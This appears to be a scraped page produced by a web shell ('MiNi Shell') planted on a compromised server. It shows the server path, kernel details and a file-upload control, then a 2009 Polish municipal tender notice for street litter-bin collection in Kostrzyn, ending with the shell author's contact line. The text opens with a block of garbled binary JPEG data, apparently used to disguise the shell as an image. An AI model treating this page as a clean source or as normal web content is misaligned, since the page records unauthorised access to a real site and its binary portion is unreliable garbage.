JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090120/6230-N-2009.html

<p class="kh_header"><b>Kostrzyn: WYWÓZ ŚMIECI Z KOSZY ULICZNYCH NA TERENIE MIASTA I GMINY KOSTRZYN W 2009 R</b><br>
<b>Numer ogłoszenia: 6230 - 2009; data zamieszczenia: 20.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Kostrzyn Urząd Miejski w Kostrzynie , ul. Dworcowa 5, 62-025 Kostrzyn, woj. wielkopolskie, tel. 061 8178565, faks 061 8178191.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kostrzyn.wlkp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYWÓZ ŚMIECI Z KOSZY ULICZNYCH NA TERENIE MIASTA I GMINY KOSTRZYN W 2009 R.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wywóz śmieci z koszy ulicznych i przystankowych,   worków ze śmieciami oraz  kontenerów o pojemności 1100 l znajdujących się na terenie miasta i gminy Kostrzyn w 2009 r.  

1.	Do zadań Wykonawcy należy : opróżnianie koszy ulicznych o poj. 60 l., znajdujących się na terenie miasta Kostrzyna 3 razy w tygodniu, w następujące dni tygodnia : poniedziałek, środa i piątek. Aktualna ilość koszy 44 szt.,
-	ustawienie i zawieszenie koszy ulicznych, po ich opróżnieniu w taki sposób, aby otwór  do wrzucania śmieci był skierowany w stronę chodnika dla pieszych,
-	wywozu  nieczystości stałych - luzu (w workach foliowych), które sporadycznie mogą znajdować się przy pojemnikach. Przybliżona ilość worków  45 szt. na tydzień,
-	bieżące informowanie Zamawiającego o miejscach występowania worków przy pojemnikach,
-	opróżnianie koszy o poj. 60 l., znajdujących się w obrębie przystanków autobusowych  zlokalizowanych na terenie gminy Kostrzyn  - 2 razy w miesiącu : w I i III poniedziałek miesiąca. Aktualna ilość koszy 11 szt.,
-	wywóz śmieci z pojemników o poj. 1100 l. - ok. 5 szt. po imprezach okolicznościowych, organizowanych  na terenie miasta i gminy Kostrzyn średnio 10 razy w roku. Wywóz - wyłącznie na pisemne lub telefoniczne zgłoszenie osoby upoważnionej przez Zamawiającego,
-	wywóz śmieci z pojemnika 1100 l. - 1 szt., zlokalizowanego przy świetlicy w Czerlejnku -  średnio               1 raz na dwa miesiące. Wywóz - wyłącznie na telefoniczne zgłoszenie sołtysa wsi  Czerlejnko,
-	wywóz na wysypisko śmieci -  worków o poj. 110 l. - zebranych podczas akcji sprzątanie świata - 2 razy w roku po ok. 100  szt. Wywóz ten nastąpi po uprzednim  telefonicznym zgłoszeniu przez Zamawiającego,
2.	Szczegółowy wykaz miejsc, w których zlokalizowane są kosze oraz ich ilości zostały określone pod pozycjami: 1 - 14 i 16 - 38  Harmonogramu, będącego załącznikiem (zał. nr 5 do SIWZ), 
3.	Wykonawca będzie przestrzegał ustalonych w Harmonogramie dni wywozu,
4.	Jeżeli planowany dzień wywozu jest dniem świątecznym Wykonawca ustali z Zamawiającym indywidualny harmonogram na cały tydzień,
5.	W przypadku, gdy rzeczywiste zapotrzebowanie na wywóz śmieci będzie odbiegać od przewidywanych krotności wywozów określonych w Harmonogramie, Wykonawca lub Zamawiający może wystąpić o wprowadzenie stosownych korekt,
6.	Harmonogram może ulec zmianie wyłącznie za zgodą Zamawiającego,
7.	Zamawiający planuje zwiększenie ilości koszy:  na terenie miasta o 10 szt., na terenie gminy o 5 szt. 
8.	Zamawiający informuje, że dodatkowe  kosze zostały ujęte przy ustalaniu ilości pojemników przeznaczonych do wywozu w ciągu  realizacji usługi. Zawarte zostały również w  Harmonogramie i zostały  uwzględnione w kosztorysie ofertowym (zał. nr 4 i 5 do SIWZ), 
9.	Zamawiający na bieżąco  będzie informował pisemnie  lub telefonicznie Wykonawcę o ilości i miejscu dostawienia nowych koszy ulicznych,
10.	W sytuacjach wątpliwych,  Zamawiający zastrzega sobie prawo do bieżącej kontroli wywozu. Kontrola polegać będzie na wprowadzeniu obowiązku potwierdzania wykonanej usługi bezpośrednio po jej zrealizowaniu. Potwierdzenia dokonywać będzie pracownik upoważniony przez Zamawiającego. Wzór Karty wywozu śmieci  stanowi załącznik nr 6 do SIWZ. Jeżeli objazd nastąpi  w poniedziałek po godz. 17.00 lub  środę i piątek  po 15.15  Wykonawca po potwierdzenie wykonania usługi zgłosi się w  następnym dniu roboczym,
11.	Wykonawca zobowiązany jest   do zachowania  należytej staranności przy opróżnianiu pojemników, a w szczególności do usunięcia śmieci z jezdni lub chodnika, które mogą wypaść podczas opróżniania koszy,
12.	W przypadku uszkodzenia pojemników (koszy ulicznych i przystankowych lub kontenerów) przez Wykonawcę, Zamawiający zastrzega sobie prawo dochodzenia odszkodowania,
13.	Wykonawca zobowiązuje się do bezzwłocznego informowania Zamawiającego o uszkodzonych pojemnikach lub innych nieprawidłowościach występujących w trakcie realizacji zamówienia (wskazana forma pisemna),
14.	Wykonawca zobowiązuje się do gotowości w razie wystąpienia nagłej potrzeby wywozu śmieci w dodatkowe dni wolne od pracy,  np : w soboty, Nowy Rok, itp.
15.	Wykonawca zobowiązany jest przedstawić Zamawiającemu w formie pisemnej roczne sprawozdanie o ilości (Mg, kg) wywiezionych z terenu miasta i  gminy Kostrzyn  śmieci, w terminie do 30 dni po zakończeniu roku kalendarzowego, którego sprawozdanie będzie dotyczyć,
16.	Wykonawca powinien posiadać karty przekazania wywiezionych podczas trwania zadania odpadów na składowisko,
17.	W trakcie obowiązywania umowy ceny jednostkowe za wykonanie usług nie mogą ulec  zmianie,
18.	Zwiększenie ilości koszy, o których mowa w pkt. 7 nie spowoduje zwiększenia całkowitego wynagrodzenia Wykonawcy, gdyż ilości te zostały uwzględnione w ilościach określonych w kosztorysie ofertowym zał. nr 4 do SIWZ,
19.	W trakcie realizacji zamówienia ilość i zakres zamówienia mogą być modyfikowane w zależności od potrzeb Zamawiającego. Zamawiający zastrzega sobie prawo do zmniejszenia  zakresu usług, przyjmując do rozliczeń ceny jednostkowe za każdy opróżniony pojemnik, kontener lub worek na śmieci,
20.	Wynagrodzenie płatne będzie wyłącznie za wykonaną usługę.
21.	Usługę należy realizować specjalistycznym  środkiem transportowym służącym do wywozu śmieci i będącym w dyspozycji wykonawcy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunki ogólne udziału w postępowaniu
O udzielenie zamówienie mogą ubiegać się oferenci, którzy spełnią następujące warunki:
1)	posiadają uprawnienia do wykonywania działalności lub czynności, związanych z realizacją 	przedmiotu zamówienia,
2)	posiadają niezbędna wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami
zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

2. Warunki szczegółowe wymagane od wykonawców :

1)	Wykonawca musi posiadać aktualne zezwolenie na usuwanie odpadów komunalnych stałych na terenie miasta i gminy Kostrzyn. 
2)	 Wykonawca musi posiadać aktualne decyzje na transport odpadów.
3)	Osoby wyznaczone przez Wykonawcę do realizacji zamówienia muszą posiadać uprawnienia - prawo jazdy odpowiedniej kategorii.
4)	Wykonawca musi dysponować odpowiednimi pojazdami oraz niezbędnym sprzętem (wraz z obsługą) do realizacji niniejszego przedmiotu zamówienia - pojazd specjalistyczny do wywozu śmieci,
5)	Wykonawca w okresie ostatnich trzech latach przed dniem wszczęcia  postępowania o udzielenie zamówienia (tj. 20.01.2009 r.), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał z należytą starannością co najmniej jedno zamówienie o charakterze i złożoności porównywalnej z zakresem zamówienia, na które Wykonawca składa ofertę i o którym mowa w punkcie III niniejszej SIWZ  i dysponuje odpowiednimi referencjami potwierdzającymi to. 
6)	Wykonawca musi posiadać polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, zgodnie z przedmiotem zamówienia.
7)	Informacja w zakresie wykonywania zamówienia przez podwykonawców - zamawiający nie przewiduje możliwości wykonywania usług przez podwykonawców, z wyjątkiem sytuacji losowych, wówczas całkowitą odpowiedzialność za realizację zamówienia ponosić będzie Wykonawca.
Ocena spełniania warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych dokumentów na zasadzie: spełnia - nie spełnia.

3.1.  Z ubiegania się o udzielenie zamówienia publicznego wyklucza się:
1)	wykonawców, którzy nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, o
których mowa w art. 22. ust.  pkt. 1-3, art. 24 ust. 1 Prawa zamówień publicznych,
2)	wykonawców,     którzy   bezpośrednio  wykonywali    czynności    związane    z    przygotowaniem     prowadzonego postępowania,   lub   posługiwali   się   w   celu   sporządzenia   oferty   osobami   uczestniczącymi   w dokonywaniu tych czynności, chyba, że udział  tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji,
3)	wykonawców,   którzy   złożyli   nieprawdziwe   informacje   mające   wpływ   na   wynik   prowadzonego
postępowania,
4)	wykonawców, którzy nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub
dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy , z zastrzeżeniem art. 26 ust. 3,
5)	wykonawców, którzy nie zgodzili się na przedłużenie okresu związania ofertą.

Zamawiający odrzuca ofertę, jeżeli:

1)	jest  niezgodna   z   ustawą ,
2)	jej  treść   nie   odpowiada   treści   specyfikacji   istotnych   warunków  zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3;
3)	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej
konkurencji,
4)	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
5)	została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia,
6)	zawiera błędy w obliczeniu ceny,
7)	Wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3,
8)	jest nieważna na podstawie odrębnych przepisów.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, wykonawca składa następujące dokumenty:

1. Dokumenty wymagane:
1)	aktualny odpis z właściwego  rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności
gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru  lub zgłoszenia do ewidencji
działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania
ofert, (tj. wystawiony po dniu 27.07.2008 r.),
2)	dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych,
3)	oświadczenie do postępowania o zamówienia publiczne z art. 22 ust. 1 ustawy Prawo zamówień Publicznych z wykorzystaniem wzoru oraz oświadczenie dotyczące właściwości Wykonawcy - zawarte w załączniku nr 1 do SIWZ.
4)	Wypełniony i podpisany formularz ofertowy - zał. nr 1 do SIWZ
5)	Wypełniony zał. nr 4 do SIWZ -  KOSZTORYS OFERTOWY,

2.	Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast  aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiedni, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

3.	Dodatkowe dokumenty wymagane w przypadku składania oferty wspólnej
1)	umowa regulująca współpracę podmiotów występujących wspólnie lub zobowiązanie do jej zawarcia w 
	przypadku wyboru ich oferty.
2)	Oferta winna zawierać wymienione wcześniej wymagane dokumenty dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie .

4.    Inne dokumenty:

1.	W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę oraz doświadczenie, potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia -- wystarczy oświadczenie Wykonawcy, złożone w formularzu ofertowym (zał. 1 do SIWZ),
2.	 W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia -- wystarczy oświadczenie Wykonawcy, złożone w formularzu ofertowym (zał. 1 do SIWZ)
Wszystkie dokumenty (z wyjątkiem oryginałów pełnomocnictw i upoważnień do podpisania oferty) mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność (każdą zapisaną stronę dokumentu) przez osobę lub osoby uprawnioną do podpisania oferty z dopiskiem za zgodność z oryginałem i z datą dokonania potwierdzenia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.kostrzyn.wlkp.pl (bip, przetargi, SIWZ, 2009).<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD MIEJSKI w Kostrzynie, 62-025 KOSTRZYN, ul. Dworcowa 5 pok. 31 - p. II.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.01.2009 godzina 09:00, miejsce: URZĄD MIEJSKI w Kostrzynie, 62-025 KOSTRZYN, ul. Dworcowa 5 pok. 01 - sekretariat - p. I.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 26.02.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com